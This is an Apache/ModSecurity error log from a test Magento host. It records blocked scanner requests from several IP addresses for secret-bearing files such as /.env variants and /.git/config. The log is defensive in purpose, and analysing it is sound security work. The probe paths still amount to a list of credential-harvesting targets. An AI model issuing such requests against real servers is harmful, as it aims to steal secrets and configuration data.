[Thu Apr 24 04:53:46.210778 2025] [:error] [pid 2695501] [client 93.123.109.81:47946] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAmnugg8-OLWLJp_cI3zqAAAAAQ"]
[Thu Apr 24 04:53:46.443143 2025] [:error] [pid 2695499] [client 93.123.109.81:47954] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAmnuif8zJS1khV-2PWAfQAAAAI"]
[Thu Apr 24 04:53:46.443392 2025] [:error] [pid 2695499] [client 93.123.109.81:47954] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAmnuif8zJS1khV-2PWAfQAAAAI"]
[Thu Apr 24 04:53:46.443577 2025] [:error] [pid 2695499] [client 93.123.109.81:47954] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAmnuif8zJS1khV-2PWAfQAAAAI"]
[Thu Apr 24 04:53:46.656124 2025] [:error] [pid 2695523] [client 93.123.109.81:47956] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAmnumZ32amBWTx7SK9YKAAAAAc"]
[Thu Apr 24 04:53:46.656405 2025] [:error] [pid 2695523] [client 93.123.109.81:47956] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAmnumZ32amBWTx7SK9YKAAAAAc"]
[Thu Apr 24 04:53:46.656568 2025] [:error] [pid 2695523] [client 93.123.109.81:47956] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAmnumZ32amBWTx7SK9YKAAAAAc"]
[Thu Apr 24 04:53:49.313942 2025] [authz_core:error] [pid 2695500] [client 93.123.109.81:48040] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Apr 24 04:53:49.391356 2025] [:error] [pid 2695498] [client 93.123.109.81:48046] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAmnvT-uKDfJBL34dn_n5QAAAAE"]
[Thu Apr 24 04:53:49.391591 2025] [:error] [pid 2695498] [client 93.123.109.81:48046] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAmnvT-uKDfJBL34dn_n5QAAAAE"]
[Thu Apr 24 04:53:49.391820 2025] [:error] [pid 2695498] [client 93.123.109.81:48046] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAmnvT-uKDfJBL34dn_n5QAAAAE"]
[Sun Apr 27 18:35:53.418000 2025] [:error] [pid 2760973] [client 185.189.44.148:40510] [client 185.189.44.148] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA5c6aZOexqIjuxn-BMzqwAAAAQ"]
[Sun Apr 27 18:35:53.419225 2025] [:error] [pid 2760973] [client 185.189.44.148:40510] [client 185.189.44.148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA5c6aZOexqIjuxn-BMzqwAAAAQ"]
[Sun Apr 27 18:35:53.419421 2025] [:error] [pid 2760973] [client 185.189.44.148:40510] [client 185.189.44.148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA5c6aZOexqIjuxn-BMzqwAAAAQ"]
[Tue Apr 29 17:54:01.715738 2025] [:error] [pid 2813556] [client 93.123.109.16:60098] [client 93.123.109.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBD2GYyAT3z_yPOAcRTErQAAAAk"]
[Tue Apr 29 17:54:01.716005 2025] [:error] [pid 2813556] [client 93.123.109.16:60098] [client 93.123.109.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBD2GYyAT3z_yPOAcRTErQAAAAk"]
[Tue Apr 29 17:54:01.716202 2025] [:error] [pid 2813556] [client 93.123.109.16:60098] [client 93.123.109.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBD2GYyAT3z_yPOAcRTErQAAAAk"]
[Fri May 02 04:16:02.824242 2025] [:error] [pid 2869379] [client 64.227.111.28:37718] [client 64.227.111.28] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBQq4t6rIxceQLEbgwhpCwAAAAU"]
[Fri May 02 04:16:02.825613 2025] [:error] [pid 2869379] [client 64.227.111.28:37718] [client 64.227.111.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBQq4t6rIxceQLEbgwhpCwAAAAU"]
[Fri May 02 04:16:02.825799 2025] [:error] [pid 2869379] [client 64.227.111.28:37718] [client 64.227.111.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBQq4t6rIxceQLEbgwhpCwAAAAU"]
[Sat May 03 21:26:21.965145 2025] [:error] [pid 2904382] [client 216.81.248.36:49348] [client 216.81.248.36] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBZt3fmQ27esDRCAchf9TAAAAAo"]
[Sat May 03 21:26:21.966329 2025] [:error] [pid 2904382] [client 216.81.248.36:49348] [client 216.81.248.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBZt3fmQ27esDRCAchf9TAAAAAo"]
[Sat May 03 21:26:21.966516 2025] [:error] [pid 2904382] [client 216.81.248.36:49348] [client 216.81.248.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBZt3fmQ27esDRCAchf9TAAAAAo"]
[Tue May 27 21:15:41.671210 2025] [:error] [pid 3446702] [client 35.185.239.196:55074] [client 35.185.239.196] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDYPXVeeD4jLOxUkjX3w6gAAAAk"]
[Tue May 27 21:15:41.673503 2025] [:error] [pid 3446702] [client 35.185.239.196:55074] [client 35.185.239.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDYPXVeeD4jLOxUkjX3w6gAAAAk"]
[Tue May 27 21:15:41.673687 2025] [:error] [pid 3446702] [client 35.185.239.196:55074] [client 35.185.239.196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDYPXVeeD4jLOxUkjX3w6gAAAAk"]
[Sun Jun 01 05:34:49.561287 2025] [:error] [pid 3559375] [client 3.144.94.54:46058] [client 3.144.94.54] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDvKWdQUy1PZB4YMXNwItAAAAAY"]
[Sun Jun 01 05:34:49.565870 2025] [:error] [pid 3559375] [client 3.144.94.54:46058] [client 3.144.94.54] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDvKWdQUy1PZB4YMXNwItAAAAAY"]
[Sun Jun 01 05:34:49.566545 2025] [:error] [pid 3559375] [client 3.144.94.54:46058] [client 3.144.94.54] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDvKWdQUy1PZB4YMXNwItAAAAAY"]
[Mon Jun 09 03:22:14.300065 2025] [:error] [pid 3731769] [client 13.39.163.23:52744] [client 13.39.163.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEY3Rs_4N-fqWNn9gMEWiwAAAAA"]
[Mon Jun 09 03:22:14.301402 2025] [:error] [pid 3731769] [client 13.39.163.23:52744] [client 13.39.163.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEY3Rs_4N-fqWNn9gMEWiwAAAAA"]
[Mon Jun 09 03:22:14.301578 2025] [:error] [pid 3731769] [client 13.39.163.23:52744] [client 13.39.163.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEY3Rs_4N-fqWNn9gMEWiwAAAAA"]
[Mon Jun 09 23:36:14.057231 2025] [:error] [pid 3743361] [client 139.59.3.207:51572] [client 139.59.3.207] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEdTzqXLE-rVw9xr0h9AngAAAAA"]
[Mon Jun 09 23:36:14.057476 2025] [:error] [pid 3743361] [client 139.59.3.207:51572] [client 139.59.3.207] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEdTzqXLE-rVw9xr0h9AngAAAAA"]
[Mon Jun 09 23:36:14.057661 2025] [:error] [pid 3743361] [client 139.59.3.207:51572] [client 139.59.3.207] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEdTzqXLE-rVw9xr0h9AngAAAAA"]
[Mon Jun 09 23:36:30.339062 2025] [authz_core:error] [pid 3731785] [client 139.59.3.207:35084] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Mon Jun 09 23:36:43.052467 2025] [authz_core:error] [pid 3743361] [client 139.59.3.207:39234] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Sun Jun 22 03:32:22.734197 2025] [:error] [pid 4017549] [client 34.245.41.58:55604] [client 34.245.41.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFddJnugBGURZcnwBzu3iAAAAAE"]
[Sun Jun 22 03:32:22.735763 2025] [:error] [pid 4017549] [client 34.245.41.58:55604] [client 34.245.41.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFddJnugBGURZcnwBzu3iAAAAAE"]
[Sun Jun 22 03:32:22.735956 2025] [:error] [pid 4017549] [client 34.245.41.58:55604] [client 34.245.41.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFddJnugBGURZcnwBzu3iAAAAAE"]
[Mon Jun 23 12:54:35.177939 2025] [:error] [pid 4043439] [client 52.90.47.249:42000] [client 52.90.47.249] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aFkyaxU9-VlP2B14IXXBKgAAABE"]
[Mon Jun 23 12:54:35.178293 2025] [:error] [pid 4043439] [client 52.90.47.249:42000] [client 52.90.47.249] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aFkyaxU9-VlP2B14IXXBKgAAABE"]
[Mon Jun 23 12:54:35.178484 2025] [:error] [pid 4043439] [client 52.90.47.249:42000] [client 52.90.47.249] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aFkyaxU9-VlP2B14IXXBKgAAABE"]
